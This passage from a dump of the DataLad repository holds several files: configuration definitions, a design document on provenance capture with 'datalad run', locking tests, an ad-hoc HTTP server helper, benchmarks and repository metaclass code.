Should be changed with caution.'}),\n 'type': EnsureChoice('wait', 'abandon'),\n 'default': 'wait',\n },\n 'datalad.ui.progressbar': {\n 'ui': ('question', {\n 'title': 'UI progress bars',\n 'text': 'Default backend for progress reporting'}),\n 'default': None,\n 'type': EnsureChoice('tqdm', 'tqdm-ipython', 'log', 'none'),\n },\n 'datalad.ui.color': {\n 'ui': ('question', {\n 'title': 'Colored terminal output',\n 'text': 'Enable or disable ANSI color codes in outputs; \"on\" overrides NO_COLOR environment variable'}),\n 'default': 'auto',\n 'type': EnsureChoice('on', 'off', 'auto'),\n },\n 'datalad.ui.suppress-similar-results': {\n 'ui': ('question', {\n 'title': 'Suppress rendering of similar repetitive results',\n 'text': \"If enabled, after a certain number of subsequent \"\n \"results that are identical regarding key properties, \"\n \"such as 'status', 'action', and 'type', additional \"\n \"similar results are not rendered by the common result \"\n \"renderer anymore. Instead, a count \"\n \"of suppressed results is displayed. If disabled, or \"\n \"when not running in an interactive terminal, all results \"\n \"are rendered.\"}),\n 'default': True,\n 'type': EnsureBool(),\n },\n 'datalad.ui.suppress-similar-results-threshold': {\n 'ui': ('question', {\n 'title': 'Threshold for suppressing similar repetitive results',\n 'text': \"Minimum number of similar results to occur before \"\n \"suppression is considered. \"\n \"See 'datalad.ui.suppress-similar-results' for more \"\n \"information.\"}),\n 'default': 10,\n 'type': EnsureInt(),\n },\n 'datalad.save.no-message': {\n 'ui': ('question', {\n 'title': 'Commit message handling',\n 'text': 'When no commit message was provided: '\n 'attempt to obtain one interactively (interactive); '\n 'or use a generic commit message (generic). '\n 'NOTE: The interactive option is experimental. The '\n 'behavior may change in backwards-incompatible ways.'}),\n 'default': 'generic',\n 'type': EnsureChoice('interactive', 'generic'),\n },\n 'datalad.install.inherit-local-origin': {\n 'ui': ('question', {\n 'title': 'Inherit local origin of dataset source',\n 'text': \"If enabled, a local 'origin' remote of a local dataset \"\n \"clone source is configured as an 'origin-2' remote \"\n \"to make its annex automatically available. The process \"\n \"is repeated recursively for any further qualifying \"\n \"'origin' dataset thereof.\"\n \"Note that if clone.defaultRemoteName is configured \"\n \"to use a name other than 'origin', that name will be \"\n \"used instead.\"}),\n 'default': True,\n 'type': EnsureBool(),\n },\n 'datalad.save.windows-compat-warning': {\n 'ui': ('question', {\n 'title': 'Action when Windows-incompatible file names are saved',\n 'text': \"Certain characters or names can make file names \"\n \"incompatible with Windows. If such files are saved \"\n \"'warning' will alert users with a log message, 'error' \"\n \"will yield an 'impossible' result, and 'none' will \"\n \"ignore the incompatibility.\"}),\n 'type': EnsureChoice('warning', 'error', 'none'),\n 'default': 'warning',\n\n },\n 'datalad.source.epoch': {\n 'ui': ('question', {\n 'title': 'Datetime epoch to use for dates in built materials',\n 'text': \"Datetime to use for reproducible builds. 
Originally introduced \"\n \"for Debian packages to interface SOURCE_DATE_EPOCH described at \"\n \"https://reproducible-builds.org/docs/source-date-epoch/ .\"\n \"By default - current time\"\n }),\n 'type': EnsureFloat(),\n 'default': time.time(),\n\n },\n 'datalad.ssh.executable': {\n 'ui': ('question', {\n 'title': \"Name of ssh executable for 'datalad sshrun'\",\n 'text': \"Specifies the name of the ssh-client executable that\"\n \"datalad will use. This might be an absolute \"\n \"path. On Windows systems it is currently by default set \"\n \"to point to the ssh executable of OpenSSH for Windows, \"\n \"if OpenSSH for Windows is installed. On other systems it \"\n \"defaults to 'ssh'.\"}),\n 'destination': 'global',\n 'type': EnsureStr(),\n 'default_fn': get_default_ssh,\n }\n}\n\ndefinitions = _ConfigDefinitions()\n" }, { "alpha_fraction": 0.7558020353317261, "alphanum_fraction": 0.7583617568016052, "avg_line_length": 42.73134231567383, "blob_id": "09d36ad0e8d21202b4039553b22d754618724797", "content_id": "e034c39f1928456ab4d0d9bdee683eecd3c5e0e3", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 5860, "license_type": "permissive", "max_line_length": 101, "num_lines": 134, "path": "/docs/source/design/provenance_capture.rst", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": ".. -*- mode: rst -*-\n.. vi: set ft=rst sts=4 ts=4 sw=4 et tw=79:\n\n.. _chap_design_provenance_capture:\n\n******************\nProvenance capture\n******************\n\n.. topic:: Specification scope and status\n\n This specification describes the current implementation.\n\nThe ability to capture process provenance---the information what activity\ninitiated by which entity yielded which outputs, given a set of parameters, a\ncomputational environment, and potential input data---is a core feature of\nDataLad.\n\nProvenance capture is supported for any computational process that can be\nexpressed as a command line call. The simplest form of provenance tracking can\nbe implemented by prefixing any such a command line call with ``datalad run\n...``. When executed in the content of a dataset (with the current working\ndirectory typically being in the root of a dataset), DataLad will then:\n\n1. check the dataset for any unsaved modifications\n2. execute the given command, when no modifications were found\n3. save any changes to the dataset that exist after the command has exited without error\n\nThe saved changes are annotated with a structured record that, at minimum,\ncontains the executed command.\n\nThis kind of usage is sufficient for building up an annotated history of a\ndataset, where all relevant modifications are clearly associated with the\ncommands that caused them. By providing more, optional, information to the\n``run`` command, such as a declaration of inputs and outputs, provenance\nrecords can be further enriched. 
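For illustration, a minimal sketch of such an enriched call (the script and\nfile names here are hypothetical, not taken from a real dataset) could be::\n\n    datalad run -m 'compute stats' --input data/raw.csv --output results/stats.csv 'python code/stats.py data/raw.csv results/stats.csv'\n\nThe declared paths, together with the command itself, then become part of the\nsaved provenance record. 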
This enables additional functionality, such as\nthe automated re-execution of captured processes.\n\n\nThe provenance record\n=====================\n\nA DataLad provenance record is a key-value mapping comprising the following\nmain items:\n\n- ``cmd``: executed command, which may contain placeholders\n- ``dsid``: DataLad ID of dataset in whose context the command execution took place\n- ``exit``: numeric exit code of the command\n- ``inputs``: a list of (relative) file paths for all declared inputs\n- ``outputs``: a list of (relative) file paths for all declared outputs\n- ``pwd``: relative path of the working directory for the command execution\n\nA provenance record is stored in a JSON-serialized form in one of two locations:\n\n1. In the body of the commit message created when saving caused the dataset modifications\n2. In a sidecar file underneath ``.datalad/runinfo`` in the root dataset\n\nSidecar files have a filename (``record_id``) that is based on checksum of the\nprovenance record content, and are stored as LZMA-compressed binary files.\nWhen a sidecar file is used, its ``record_id`` is added to the commit message,\ninstead of the complete record.\n\n\nDeclaration of inputs and outputs\n=================================\n\nWhile not strictly required, it is possible and recommended to declare all\npaths for process inputs and outputs of a command execution via the respective\noptions of ``run``.\n\nFor all declared inputs, ``run`` will ensure that their file content is present\nlocally at the required version before executing the command.\n\nFor all declared outputs, ``run`` will ensure that the respective locations are\nwriteable.\n\nIt is recommended to declare inputs and outputs both exhaustively and precise,\nin order to enable the provenance-based automated re-execution of a command. In\ncase of a future re-execution the dataset content may have changed\nsubstantially, and a needlessly broad specification of inputs/outputs may lead\nto undesirable data transfers.\n\n\nPlaceholders in commands and IO specifications\n==============================================\n\nBoth command and input/output specification can employ placeholders that will\nbe expanded before command execution. Placeholders use the syntax of the Python\n``format()`` specification. A number of standard placeholders are supported\n(see the ``run`` documentation for a complete list):\n\n- ``{pwd}`` will be replaced with the full path of the current working directory\n- ``{dspath}`` will be replaced with the full path of the dataset that run is invoked on\n- ``{inputs}`` and ``{outputs}`` expand a space-separated list of the declared input and output paths\n\nAdditionally, custom placeholders can be defined as configuration variables\nunder the prefix ``datalad.run.substitutions.``. For example, a configuration\nsetting ``datalad.run.substitutions.myfile=data.txt`` will cause the\nplaceholder ``{myfile}`` to expand to ``data.txt``.\n\nSelection of individual items for placeholders that expand to multiple values\nis possible via the standard Python ``format()`` syntax, for example\n``{inputs[0]}``.\n\n\nResult records emitted by ``run``\n=================================\n\nWhen performing a command execution ``run`` will emit results for:\n\n1. Input preparation (i.e. downloads)\n2. Output preparation (i.e. unlocks and removals)\n3. Command execution\n4. Dataset modification saving (i.e. additions, deletions, modifications)\n\nBy default, ``run`` will stop on the first error. 
This means that, for example,\nany failure to download content will prevent command execution. A failing\ncommand will prevent saving a potential dataset modification. This behavior can\nbe altered using the standard ``on_failure`` switch of the ``run`` command.\n\nThe emitted result for the command execution contains the provenance record\nunder the ``run_info`` key.\n\n\nImplementation details\n======================\n\nMost of the described functionality is implemented by the function\n:func:`datalad.core.local.run.run_command`. It is interfaced by the ``run``\ncommand, but also ``rerun``, a utility for automated re-execution based on\nprovenance records, and ``containers-run`` (provided by the ``container``\nextension package) for command execution in DataLad-tracked containerized\nenvironments. This function has a more complex interface, and supports a wider\nrange of use cases than described here.\n" }, { "alpha_fraction": 0.6171975135803223, "alphanum_fraction": 0.6260533928871155, "avg_line_length": 36.84324264526367, "blob_id": "133aaf81252de6852d5b696a48eb77a75c0cc0ad", "content_id": "055dca8f790cde3dc65bfa7842aab7571a0c0794", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 7001, "license_type": "permissive", "max_line_length": 115, "num_lines": 185, "path": "/datalad/support/tests/test_locking.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "#emacs: -*- mode: python-mode; py-indent-offset: 4; tab-width: 4; indent-tabs-mode: nil -*- \n#ex: set sts=4 ts=4 sw=4 et:\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n#\n# See COPYING file distributed along with the datalad package for the\n# copyright and license terms.\n#\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\nimport os\nimport os.path as op\nimport sys\nfrom pathlib import Path\nfrom time import time\n\nfrom fasteners import InterProcessLock\n\nfrom datalad.tests.utils_pytest import (\n assert_false,\n assert_greater,\n assert_in,\n assert_not_in,\n assert_raises,\n assert_true,\n eq_,\n ok_,\n ok_exists,\n on_osx,\n with_tempfile,\n)\n\nfrom ...cmd import (\n CommandError,\n StdOutErrCapture,\n WitlessRunner,\n)\nfrom ...utils import ensure_unicode\nfrom ..locking import (\n lock_if_check_fails,\n try_lock_informatively,\n)\n\n\nclass Subproc:\n # By implementing this closure as a class instead of as a nested function,\n # it becomes possible to pickle it.\n\n def __init__(self, tempfile):\n self.tempfile = tempfile\n\n def __call__(self, q):\n with lock_if_check_fails(False, self.tempfile, blocking=False, _return_acquired=True)\\\n as (_, lock2, acquired):\n # we used to check for .acquired here but it was removed from\n # fasteners API: https://github.com/harlowja/fasteners/issues/71\n q.put(acquired)\n\n\n@with_tempfile\ndef test_lock_if_check_fails(tempfile=None):\n # basic test, should never try to lock so filename is not important\n with lock_if_check_fails(True, None) as (check, lock):\n assert check is True\n assert lock is None\n assert check # still available outside\n # and with a callable\n with lock_if_check_fails(lambda: \"valuable\", None) as (check, lock):\n eq_(check, \"valuable\")\n assert lock is None\n eq_(check, \"valuable\")\n\n # basic test, should never try to lock so filename is not important\n with lock_if_check_fails(False, tempfile) as (check, lock):\n ok_(lock)\n ok_exists(tempfile + '.lck')\n assert not op.exists(tempfile + 
'.lck') # and it gets removed after\n\n # the same with providing operation\n # basic test, should never try to lock so filename is not important\n with lock_if_check_fails(False, tempfile, operation='get') as (check, lock):\n ok_(lock)\n ok_exists(tempfile + '.get-lck')\n assert not op.exists(tempfile + '.get-lck') # and it gets removed after\n\n from multiprocessing import (\n Process,\n Queue,\n )\n q = Queue()\n p = Process(target=Subproc(tempfile), args=(q,))\n\n # now we need somehow to actually check the bloody lock functioning\n with lock_if_check_fails((op.exists, (tempfile,)), tempfile, _return_acquired=True) as (check, lock, acquired):\n eq_(check, False)\n ok_(lock)\n ok_(acquired)\n # but now we will try to lock again, but we need to do it in another\n # process\n p.start()\n assert q.get() is False\n p.join()\n with open(tempfile, 'w') as f:\n pass\n ok_exists(tempfile)\n ok_exists(tempfile)\n\n # and we redo -- it will acquire it\n p = Process(target=Subproc(tempfile), args=(q,))\n p.start()\n ok_(q.get())\n p.join()\n\n\n@with_tempfile\ndef test_try_lock_informatively(tempfile=None):\n lock = InterProcessLock(tempfile + '.lck')\n lock_path = ensure_unicode(lock.path) # can be bytes, complicates string formattingetc\n t0 = time()\n with try_lock_informatively(lock, purpose=\"happy life\") as acquired:\n assert_true(lock.acquired)\n assert_true(acquired)\n assert_greater(2, time() - t0) # should not take any notable time, we cannot be blocking\n\n \"\"\"\n # InterProcessLock is not re-entrant so nesting should not be used, will result\n # in exception on release\n with try_lock_informatively(lock, timeouts=[dt, dt*2], proceed_unlocked=True) as acquired:\n assert_true(lock.acquired) # due to outer cm\n assert_true(acquired) # lock is reentrant apparently\n \"\"\"\n # Let's try in a completely different subprocess\n runner = WitlessRunner(env=dict(os.environ, DATALAD_LOG_LEVEL='info', DATALAD_LOG_TARGET='stderr'))\n\n script1 = Path(tempfile + \"-script1.py\")\n script1_fmt = f\"\"\"\nfrom fasteners import InterProcessLock\nfrom time import time\n\nfrom datalad.support.locking import try_lock_informatively\n\nlock = InterProcessLock({lock_path!r})\n\nwith try_lock_informatively(lock, timeouts=[0.05, 0.15], proceed_unlocked={{proceed_unlocked}}) as acquired:\n print(\"Lock acquired=%s\" % acquired)\n\"\"\"\n script1.write_text(script1_fmt.format(proceed_unlocked=True))\n t0 = time()\n res = runner.run([sys.executable, str(script1)], protocol=StdOutErrCapture)\n assert_in('Lock acquired=False', res['stdout'])\n assert_in(f'Failed to acquire lock at {lock_path} in 0.05', res['stderr'])\n assert_in(f'Failed to acquire lock at {lock_path} in 0.15', res['stderr'])\n assert_in('proceed without locking', res['stderr'])\n assert_greater(time() - t0, 0.19999) # should wait for at least 0.2\n try:\n import psutil\n\n # PID does not correspond\n assert_in('Check following process: PID=', res['stderr'])\n assert_in(f'CWD={os.getcwd()} CMDLINE=', res['stderr'])\n except ImportError:\n pass # psutil was not installed, cannot get list of files\n except AssertionError:\n # we must have had the other one then\n assert_in('failed to determine one', res['stderr'])\n if not on_osx:\n # so far we had only OSX reporting failing to get PIDs information\n # but if it is something else -- re-raise original exception\n raise\n\n # in 2nd case, lets try without proceeding unlocked\n script1.write_text(script1_fmt.format(proceed_unlocked=False))\n t0 = time()\n with assert_raises(CommandError) as cme:\n 
runner.run([sys.executable, str(script1)], protocol=StdOutErrCapture)\n assert_in(f\"Failed to acquire lock at {lock_path} in 2 attempts.\", str(cme.value))\n assert_in(f\"RuntimeError\", str(cme.value))\n assert_false(cme.value.stdout) # nothing there since print should not happen\n assert_in(f'Failed to acquire lock at {lock_path} in 0.05', cme.value.stderr)\n assert_in(f'Failed to acquire lock at {lock_path} in 0.15', cme.value.stderr)\n assert_greater(time() - t0, 0.19999) # should wait for at least 0.2\n\n # now that we left context, should work out just fine\n res = runner.run([sys.executable, str(script1)], protocol=StdOutErrCapture)\n assert_in('Lock acquired=True', res['stdout'])\n assert_not_in(f'Failed to acquire lock', res['stderr'])\n assert_not_in('PID', res['stderr'])\n" }, { "alpha_fraction": 0.644095778465271, "alphanum_fraction": 0.6498761177062988, "avg_line_length": 27.83333396911621, "blob_id": "21741509b5d361abfc49f931dfd22af02866d5ce", "content_id": "33d9561162936089dcf97e406b869d5e1a6b93fa", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1211, "license_type": "permissive", "max_line_length": 78, "num_lines": 42, "path": "/tools/adhoc-httpd", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n# Helper to launch an ad-hoc http server, with or without SSL enabled,\n# and with or without required basic authentication\n#\n# usage: adhoc-httpd <path-to-serve> [<ssl|nossl> [<user> <password>]]\n# examples:\n# % adhoc-httpd .\n# % adhoc-httpd /tmp ssl\n# % adhoc-httpd /tmp nossl myuser yourpassword\n\nimport sys\nfrom pathlib import Path\n\nfrom datalad.tests.utils_pytest import serve_path_via_http\n\npath = Path(sys.argv[1]) if len(sys.argv) > 1 else Path.cwd()\nif not path.exists():\n raise ValueError(f'Path {path} does not exist')\n\nssl = 'nossl'\nuse_ssl = False\nif len(sys.argv) > 2:\n ssl = sys.argv[2]\n if ssl not in ('ssl', 'nossl'):\n raise ValueError('SSL argument must be \"ssl\" or \"nossl\"')\n use_ssl = ssl == 'ssl'\nauth = None\nif len(sys.argv) > 3:\n if len(sys.argv) != 5:\n raise ValueError(\n 'Usage to enable authentication: '\n 'adhoc-httpd <path-to-serve> <ssl|nossl <user> <password>')\n auth = tuple(sys.argv[3:])\n\n\n@serve_path_via_http(path, use_ssl=use_ssl, auth=auth)\ndef runner(path, url):\n print(f'Serving {path} at {url} [{ssl}] (required authentication {auth})')\n input(\"Hit Return to stop serving\")\n\n\nrunner()\n" }, { "alpha_fraction": 0.5962666869163513, "alphanum_fraction": 0.6000000238418579, "avg_line_length": 25.785715103149414, "blob_id": "47b4d707ab94411e8f18f9e501a26d395a45a005", "content_id": "c421dfb2d48f89ae45ef8afec882ed4e70a153d0", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1875, "license_type": "permissive", "max_line_length": 79, "num_lines": 70, "path": "/benchmarks/core.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "# ex: set sts=4 ts=4 sw=4 noet:\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n#\n# See COPYING file distributed along with the datalad package for the\n# copyright and license terms.\n#\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n\"\"\"Benchmarks for DataLad\"\"\"\n\nimport os\nimport sys\nimport os.path as osp\n\nfrom subprocess import call\n\nfrom datalad.runner import (\n Runner,\n GitRunner,\n 
StdOutErrCapture,\n)\n\n\n# Some tracking example -- may be we should track # of datasets.datalad.org\n#import gc\n#def track_num_objects():\n# return len(gc.get_objects())\n#track_num_objects.unit = \"objects\"\n\n\nfrom .common import SuprocBenchmarks\n\nscripts_dir = osp.join(osp.dirname(__file__), 'scripts')\nheavyout_cmd = \"{} 1000\".format(osp.join(scripts_dir, 'heavyout'))\n\n\nclass startup(SuprocBenchmarks):\n \"\"\"\n Benchmarks for datalad commands startup\n \"\"\"\n\n def setup(self):\n # we need to prepare/adjust PATH to point to installed datalad\n # We will base it on taking sys.executable\n python_path = osp.dirname(sys.executable)\n self.env = os.environ.copy()\n self.env['PATH'] = '%s:%s' % (python_path, self.env.get('PATH', ''))\n\n def time_import(self):\n call([sys.executable, \"-c\", \"import datalad\"])\n\n def time_import_api(self):\n call([sys.executable, \"-c\", \"import datalad.api\"])\n\n\nclass witlessrunner(SuprocBenchmarks):\n \"\"\"Some rudimentary tests to see if there is no major slowdowns of Runner\n \"\"\"\n\n def setup(self):\n self.runner = Runner()\n self.git_runner = GitRunner()\n\n def time_echo(self):\n self.runner.run([\"echo\"])\n\n def time_echo_gitrunner(self):\n self.git_runner.run([\"echo\"])\n\n def time_echo_gitrunner_fullcapture(self):\n self.git_runner.run([\"echo\"], protocol=StdOutErrCapture)\n" }, { "alpha_fraction": 0.6124182343482971, "alphanum_fraction": 0.6185339093208313, "avg_line_length": 37.85148620605469, "blob_id": "615252e07e502eee77f4cc9378dfac244d43cd9f", "content_id": "1fb8bdc82a880d80bb23c2eb030cb250aad1c8e5", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 11777, "license_type": "permissive", "max_line_length": 104, "num_lines": 303, "path": "/datalad/dataset/repo.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "# emacs: -*- mode: python; py-indent-offset: 4; tab-width: 4; indent-tabs-mode: nil -*-\n# ex: set sts=4 ts=4 sw=4 et:\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n#\n# See COPYING file distributed along with the datalad package for the\n# copyright and license terms.\n#\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n\"\"\" utility classes for repositories\n\n\"\"\"\n\nimport logging\nimport threading\n\nfrom datalad.support.exceptions import InvalidInstanceRequestError\nfrom datalad.support.network import RI\nfrom datalad import utils as ut\n\nlgr = logging.getLogger('datalad.repo')\n\n\nclass Flyweight(type):\n \"\"\"Metaclass providing an implementation of the flyweight pattern.\n\n Since the flyweight is very similar to a singleton, we occasionally use this\n term to make clear there's only one instance (at a time).\n This integrates the \"factory\" into the actual classes, which need\n to have a class attribute `_unique_instances` (WeakValueDictionary).\n By providing an implementation of __call__, you don't need to call a\n factory's get_xy_repo() method to get a singleton. Instead this is called\n when you simply instantiate via MyClass(). So, you basically don't even need\n to know there were singletons. Therefore it is also less likely to sabotage\n the concept by not being aware of how to get an appropriate object.\n\n Multiple instances, pointing to the same physical repository can cause a\n lot of trouble. This is why this class exists. 
You should be very aware of\n the implications, if you want to circumvent that mechanism.\n\n To use this pattern, you need to add this class as a metaclass to the class\n you want to use it with. Additionally there needs to be a class attribute\n `_unique_instances`, which should be a `WeakValueDictionary`. Furthermore\n implement `_flyweight_id_from_args` method to determine, what should be the\n identifying criteria to consider two requested instances the same.\n\n Example:\n\n from weakref import WeakValueDictionary\n\n class MyFlyweightClass(object, metaclass=Flyweight):\n\n _unique_instances = WeakValueDictionary()\n\n @classmethod\n def _flyweight_id_from_args(cls, *args, **kwargs):\n\n id = kwargs.pop('id')\n return id, args, kwargs\n\n def __init__(self, some, someother=None):\n pass\n\n a = MyFlyweightClass('bla', id=1)\n b = MyFlyweightClass('blubb', id=1)\n assert a is b\n c = MyFlyweightClass('whatever', id=2)\n assert c is not a\n \"\"\"\n\n # to avoid parallel creation of (identical) instances\n _lock = threading.Lock()\n\n def _flyweight_id_from_args(cls, *args, **kwargs):\n \"\"\"create an ID from arguments passed to `__call__`\n\n Subclasses need to implement this method. The ID it returns is used to\n determine whether or not there already is an instance of that kind and\n as key in the `_unique_instances` dictionary.\n\n Besides the ID this should return args and kwargs, which can be modified\n herein and will be passed on to the constructor of a requested instance.\n\n Parameters\n ----------\n args:\n positional arguments passed to __call__\n kwargs:\n keyword arguments passed to __call__\n\n Returns\n -------\n hashable, args, kwargs\n id, optionally manipulated args and kwargs to be passed to __init__\n \"\"\"\n raise NotImplementedError\n\n # TODO: - We might want to remove the classmethod from Flyweight altogether and replace by an\n # requirement to implement an actual method, since the purpose of it is actually about a\n # particular, existing instance\n # - Done. But update docs!\n # def _flyweight_invalid(cls, id):\n # \"\"\"determines whether or not an instance with `id` became invalid and\n # therefore has to be instantiated again.\n #\n # Subclasses can implement this method to provide an additional condition\n # on when to create a new instance besides there is none yet.\n #\n # Parameter\n # ---------\n # id: hashable\n # ID of the requested instance\n #\n # Returns\n # -------\n # bool\n # whether to consider an existing instance with that ID invalid and\n # therefore create a new instance. Default implementation always returns\n # False.\n # \"\"\"\n # return False\n\n # TODO: document the suggestion to implement a finalizer!\n\n def _flyweight_reject(cls, id, *args, **kwargs):\n \"\"\"decides whether to reject a request for an instance\n\n This gives the opportunity to detect a conflict of an instance request\n with an already existing instance, that is not invalidated by\n `_flyweight_invalid`. 
In case the return value is not `None`, it will be\n used as the message for an `InvalidInstanceRequestError`,\n raised by `__call__`\n\n Parameters\n ----------\n id: hashable\n the ID of the instance in question as calculated by\n `_flyweight_id_from_args`\n args:\n kwargs:\n (keyword) arguments to the original call\n\n Returns:\n --------\n None or str\n \"\"\"\n return None\n\n def __call__(cls, *args, **kwargs):\n\n id_, new_args, new_kwargs = cls._flyweight_id_from_args(*args, **kwargs)\n # Thread lock following block so we do not fall victim to\n # race condition across threads trying to instantiate multiple\n # instances. In principle we better have a lock per id_ but that mean we\n # might race at getting \"name specific lock\" (Yarik did not research much),\n # so keeping it KISS -- just lock instantiation altogether, but could be\n # made smarter later on.\n with cls._lock:\n instance = cls._unique_instances.get(id_, None)\n\n if instance is None or instance._flyweight_invalid():\n # we have no such instance yet or the existing one is invalidated,\n # so we instantiate:\n instance = type.__call__(cls, *new_args, **new_kwargs)\n cls._unique_instances[id_] = instance\n else:\n # we have an instance already that is not invalid itself; check\n # whether there is a conflict, otherwise return existing one:\n # TODO\n # Note, that this might (and probably should) go away, when we\n # decide how to deal with currently possible invalid constructor\n # calls for the repo classes. In particular this is about calling\n # it with different options than before, that might lead to\n # fundamental changes in the repository (like annex repo version\n # change or re-init of git)\n\n # force? may not mean the same thing\n msg = cls._flyweight_reject(id_, *new_args, **new_kwargs)\n if msg is not None:\n raise InvalidInstanceRequestError(id_, msg)\n return instance\n\n\nclass PathBasedFlyweight(Flyweight):\n\n def _flyweight_preproc_path(cls, path):\n \"\"\"perform any desired path preprocessing (e.g., aliases)\n\n By default nothing is done\n \"\"\"\n return path\n\n def _flyweight_postproc_path(cls, path):\n \"\"\"perform any desired path post-processing (e.g., dereferencing etc)\n\n By default - realpath to guarantee reuse. Derived classes (e.g.,\n Dataset) could override to allow for symlinked datasets to have\n individual instances for multiple symlinks\n \"\"\"\n # resolve symlinks to make sure we have exactly one instance per\n # physical repository at a time\n # do absolute() in addition to always get an absolute path\n # even with non-existing paths on windows\n resolved = str(ut.Path(path).resolve().absolute())\n if ut.on_windows and resolved.startswith('\\\\\\\\'):\n # resolve() ended up converting a mounted network drive into a UNC path.\n # such paths are not supoprted (e.g. as cmd.exe CWD), hence redo and take\n # absolute path at face value. 
This has the consequence we cannot determine\n # repo duplicates mounted on different drives, but this is no worse than\n # on UNIX\n return str(ut.Path(path).absolute())\n return resolved\n\n def _flyweight_id_from_args(cls, *args, **kwargs):\n\n if args:\n # to a certain degree we need to simulate an actual call to __init__\n # and make sure, passed arguments are fitting:\n # TODO: Figure out, whether there is a cleaner way to do this in a\n # generic fashion\n assert('path' not in kwargs)\n path = args[0]\n args = args[1:]\n elif 'path' in kwargs:\n path = kwargs.pop('path')\n else:\n raise TypeError(\"__init__() requires argument `path`\")\n\n if path is None:\n lgr.debug(\"path is None. args: %s, kwargs: %s\", args, kwargs)\n raise ValueError(\"path must not be None\")\n\n # Custom handling for few special abbreviations if defined by the class\n path_ = cls._flyweight_preproc_path(path)\n\n # Sanity check for argument `path`:\n # raise if we cannot deal with `path` at all or\n # if it is not a local thing:\n localpath = RI(path_).localpath\n\n path_postproc = cls._flyweight_postproc_path(localpath)\n\n kwargs['path'] = path_postproc\n return path_postproc, args, kwargs\n # End Flyweight\n\n\n\n# TODO: see issue #1100\nclass RepoInterface(object):\n \"\"\"common operations for annex and plain git repositories\n\n Especially provides \"annex operations\" on plain git repos, that just do\n (or return) the \"right thing\"\n \"\"\"\n\n # Note: Didn't find a way yet, to force GitRepo as well as AnnexRepo to\n # implement a method defined herein, since AnnexRepo inherits from GitRepo.\n # Would be much nicer, but still - I'd prefer to have a central place for\n # these anyway.\n\n # Note 2: Seems possible. There is MRO magic:\n # http://pybites.blogspot.de/2009/01/mro-magic.html\n # http://stackoverflow.com/questions/20822850/change-python-mro-at-runtime\n\n # Test!\n pass\n\n\ndef path_based_str_repr(cls):\n \"\"\"A helper decorator for a class to define str and repr based on its .path\n\n For the rationale/discussion on why to bother distinguishing the two is\n in https://github.com/datalad/datalad/pull/4439 . The idea is that\n `__str__` should provide cut/pasteable to shell representation of the path,\n with all necessary escapes for characters shell might care about.\n `__repr__` to provide string representation consumable in Python.\n \"\"\"\n\n # %s is used over .format since it is more performant. In Python 3.7.6 I get\n # In [2]: %timeit \"%s\" % (\"buga\")\n # 29 ns ± 0.179 ns per loop (mean ± std. dev. of 7 runs, 10000000 loops each)\n # In [3]: %timeit \"{}\".format(\"buga\")\n # 62 ns ± 0.345 ns per loop (mean ± std. dev. 
of 7 runs, 10000000 loops each)\n # and similarly 58ns vs 97ns for %r vs !r\n def __str__(self):\n s = self._str\n if s is None:\n s = self._str = \\\n '%s(%s)' % (self.__class__.__name__, ut.quote_cmdlinearg(self.path))\n return s\n\n def __repr__(self):\n s = self._repr\n if s is None:\n s = self._repr = \\\n '%s(%r)' % (self.__class__.__name__, self.path)\n return s\n\n cls._str = None\n cls.__str__ = __str__\n cls._repr = None\n cls.__repr__ = __repr__\n return cls\n\n" }, { "alpha_fraction": 0.5708310604095459, "alphanum_fraction": 0.5719281435012817, "avg_line_length": 28.582149505615234, "blob_id": "519cd4f9c05a4c1937c2eba550077c62806d0dca", "content_id": "623fab363cec3d298cf5b9f42efe058ed9bf8961", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 14584, "license_type": "permissive", "max_line_length": 87, "num_lines": 493, "path": "/datalad/support/constraints.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "# emacs: -*- mode: python; py-indent-offset: 4; tab-width: 4; indent-tabs-mode: nil -*-\n# ex: set sts=4 ts=4 sw=4 et:\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n#\n# See COPYING file distributed along with the datalad package for the\n# copyright and license terms.\n#\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n\"\"\"Helper for parameter validation, documentation and conversion\"\"\"\n\n__docformat__ = 'restructuredtext'\n\nimport re\n\n\ndef _strip_typerepr(s):\n \"\"\"Strip away <class '...'> and <type '...'> decorations for docstrings\n \"\"\"\n return re.sub(r\"<(class|type) '(\\S+)'>\", r'\\2', s)\n\n\ndef _type_str(t):\n \"\"\"Get string human-readable representation of a data type\n\n If type (t) is given as a tuple, assume ability to choose any of the\n listed types, so those types listing get joined with |\n \"\"\"\n if isinstance(t, tuple):\n s = ' or '.join(map(_type_str, t))\n return (\"(%s)\" % s) if len(t) > 1 else s\n return _strip_typerepr(str(t))\n\n\nclass _NoneDeprecated:\n \"\"\"A helper construct to ease migrations for option=None.\n\n Should be instantiated, so it gains `__repr__` and thus would render nicely\n in docs etc.\n \"\"\"\n def __repr__(self):\n return 'None(DEPRECATED)'\n\n\nNoneDeprecated = _NoneDeprecated()\n\n\nclass Constraint(object):\n \"\"\"Base class for input value conversion/validation.\n\n These classes are also meant to be able to generate appropriate\n 